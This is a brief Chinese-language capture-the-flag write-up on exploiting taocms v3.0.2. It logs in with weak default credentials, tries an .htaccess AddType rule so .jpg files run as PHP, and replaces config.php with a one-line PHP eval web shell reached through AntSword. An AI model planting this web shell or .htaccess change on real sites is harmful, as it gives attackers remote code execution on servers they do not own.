目录

一、题目

二、蚁剑连接

---

一、题目

 介绍：

taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码

进入题目

 访问URL，通过弱口令登录后台：admin/tao

进入后台

 点击文件管理：

 添加AddType application/x-httpd-php .jpg添加到后面保存文件（用于解析jpg文件）

 保存之后返回文件管理：点击pictures

创建.jpg文件

然而新建文件白屏。。。

 按照官方给的就是编辑.htaccess文件：新增以下内容：AddType application/x-httpd-php .jpg，

然后在上传图片再进行解析，但在实际操作过程中无法上传和新建，只能走别的途径了。。。

二、蚁剑连接

看看能不能改文件：

进入config.php

改为一句话木马：

<?php @eval($_POST['wjsc']);?>

 上蚁剑：

 根目录下查看flag：

flag{ded865af-fb89-49cb-84ce-f537c33473b2}